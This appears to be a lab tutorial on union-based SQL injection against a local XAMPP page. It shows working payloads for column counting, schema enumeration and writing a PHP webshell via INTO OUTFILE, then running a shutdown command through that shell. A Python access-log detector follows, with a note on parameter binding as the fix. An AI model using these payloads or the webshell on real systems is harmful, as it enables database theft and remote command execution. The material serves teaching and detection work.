3. Attacking vulnerability
Finding the number of columns
http://192.168.0.101/xampp/one.php?id=1 order by 2,3…(give each number one by one)
If you get an error message for order by 3, that means there are 2 columns being used in the select query.
4. Enumerating data
The query below should show the actual data as well as 1, 2:
http://192.168.0.101/xampp/one.php?id=1 union select 1,2 from information_schema.schema_privileges--
Try removing the actual data: a value like id=-1 matches no row, so nothing is returned by the original query and only the data from the union query is shown:
http://192.168.0.101/xampp/one.php?id=-1 union select 1,2 from information_schema.schema_privileges--
5. Enumerating data
1. Database version
http://192.168.0.101/xampp/one.php?id=1 union select @@version ,2 from information_schema.schema_privileges--
2. system_user()
http://192.168.0.101/xampp/one.php?id=1 union select system_user() ,2 from information_schema.schema_privileges--
3. Table names
http://192.168.0.101/xampp/one.php?id=1 union select table_name ,2 from information_schema.columns--
4. Database names
http://192.168.0.101/xampp/one.php?id=1 union select table_schema ,2 from information_schema.columns--
6. Creating backdoor
1. Creating a webshell file “c.php”
http://192.168.0.101/xampp/one.php?id=-1 UNION SELECT "<? system($_REQUEST['cmd']); ?>", 2 INTO OUTFILE "e:/xampp/htdocs/xampp/c.php" --
2. Exploiting using the webshell
http://192.168.0.101/xampp/c.php?cmd=shutdown.exe /s
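Seen from the web server's access log, the requests in steps 3 to 6 leave a recognizable trail. The following Python is an added example, not part of the original slides: it labels each log line with the stage it matches and correlates an INTO OUTFILE target with later requests for that file. The log lines, client address and stage names are constructed, and the written payload is replaced by "x".

```python
import posixpath
import re
from urllib.parse import unquote_plus, urlsplit

# Signatures for the request shapes in steps 3-6 above (heuristic, not exhaustive).
STAGES = [
    ("column-count probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union-based read", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("schema enumeration", re.compile(r"\binformation_schema\b", re.I)),
    ("server fingerprint", re.compile(r"@@version|\bsystem_user\s*\(", re.I)),
    ("file write", re.compile(r"\binto\s+(?:out|dump)file\b", re.I)),
]
OUTFILE = re.compile(r"\binto\s+(?:out|dump)file\s*[\"']([^\"']+)[\"']", re.I)
REQUEST = re.compile(r'"(?:GET|POST) (.+?) HTTP/[\d.]+"')

def decode(query):
    """URL-decode twice (catches %2520) and collapse SQL comments and whitespace."""
    return re.sub(r"/\*.*?\*/|\s+", " ", unquote_plus(unquote_plus(query)))

def scan(lines):
    """Return [(line_no, [stage, ...])]; also flag hits on files written via OUTFILE."""
    written, findings = set(), []
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        query = decode(url.query)
        hits = [name for name, rx in STAGES if rx.search(query)]
        if posixpath.basename(url.path).lower() in written:
            hits.append("request to file written via SQLi")
        target = OUTFILE.search(query)
        if target:  # remember the written file's name for later requests
            written.add(posixpath.basename(target.group(1).replace("\\", "/")).lower())
        if hits:
            findings.append((n, hits))
    return findings

# Constructed sample access log (not from the original page); payload body is "x".
SAMPLE_LOG = [
    '192.168.0.50 - - [01/Jan/2024:10:00:01 +0000] "GET /xampp/one.php?id=1 HTTP/1.1" 200 512',
    '192.168.0.50 - - [01/Jan/2024:10:00:02 +0000] "GET /xampp/one.php?id=1%20order%20by%203 HTTP/1.1" 200 230',
    '192.168.0.50 - - [01/Jan/2024:10:00:03 +0000] "GET /xampp/one.php?id=-1%20union%20select%20table_name%20,2%20from%20information_schema.columns-- HTTP/1.1" 200 900',
    '192.168.0.50 - - [01/Jan/2024:10:00:04 +0000] "GET /xampp/one.php?id=-1%20UNION%20SELECT%20%22x%22,2%20INTO%20OUTFILE%20%22e:/xampp/htdocs/xampp/c.php%22%20-- HTTP/1.1" 200 0',
    '192.168.0.50 - - [01/Jan/2024:10:00:05 +0000] "GET /xampp/c.php?cmd=shutdown.exe%20/s HTTP/1.1" 200 40',
]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

Detection only narrows the window; the root-cause fix is binding id as a parameter in one.php. The file-write stage additionally depends on the database account holding MySQL's FILE privilege and on secure_file_priv permitting the target directory.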